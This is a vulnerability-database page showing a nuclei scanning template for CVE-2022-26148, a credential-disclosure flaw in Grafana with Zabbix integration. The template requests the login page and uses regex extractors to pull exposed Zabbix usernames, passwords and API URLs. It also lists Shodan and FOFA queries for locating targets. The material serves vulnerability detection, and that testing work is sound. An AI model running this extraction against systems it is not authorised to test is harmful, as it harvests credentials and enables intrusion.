Lucene search
K

Grafana & Zabbix Integration - Credentials Disclosure

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 79 Views

Grafana & Zabbix Integration - Credentials Disclosure vulnerability in Grafana 7.3.4 integrated with Zabbix. Source code reveals Zabbix password and URL

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-26148
21 Mar 202220:15
attackerkb
Circl
CVE-2022-26148
22 Mar 202215:21
circl
CNNVD
Grafana安全漏洞
21 Mar 202200:00
cnnvd
CNVD
Grafana has an unspecified vulnerability (CNVD-2022-25208)
23 Mar 202200:00
cnvd
CVE
CVE-2022-26148
21 Mar 202219:51
cve
Cvelist
CVE-2022-26148
21 Mar 202219:51
cvelist
NVD
CVE-2022-26148
21 Mar 202220:15
nvd
OpenVAS
Grafana Information Disclosure Vulnerability (Feb 2022) - Active Check
22 Mar 202200:00
openvas
OSV
BIT-GRAFANA-2022-26148
6 Mar 202410:57
osv
OSV
UBUNTU-CVE-2022-26148
21 Mar 202220:15
osv
Rows per page
id: CVE-2022-26148

info:
  name: Grafana & Zabbix Integration - Credentials Disclosure
  author: Geekby
  severity: critical
  description: |
    Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
  impact: |
    An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches.
  remediation: |
    Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability.
  reference:
    - https://2k8.org/post-319.html
    - https://security.netapp.com/advisory/ntap-20220425-0005/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26148
    - https://github.com/HimmelAward/Goby_POC
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26148
    cwe-id: CWE-312
    epss-score: 0.53439
    epss-percentile: 0.98862
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: grafana
    product: grafana
    shodan-query:
      - title:"Grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
      - http.title:"grafana"
    fofa-query:
      - app="Grafana"
      - title="grafana"
      - app="grafana"
    google-query: intitle:"grafana"
  tags: cve,cve2022,grafana,zabbix,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/login?redirect=%2F"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"zabbix":'
          - '"zbx":'
          - "alexanderzobnin-zabbix-datasource"
        condition: or

      - type: regex
        part: body
        regex:
          - '"password":"(.*?)"'
          - '"username":"(.*?)"'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '"password":"(.*?)"'
          - '"username":"(.*?)"'
          - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php'
# digest: 4b0a00483046022100e36c3209df5d6ea55b7c2ff1e526651d8bf9270bbf405dbc5a8e2b2f073e0e58022100acaf0f455afa61a5268cf31e8eef659e16dee750b67c3fe4d9f8c51f9dc3a51f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 27.5
CVSS 3.19.8
EPSS0.53439
79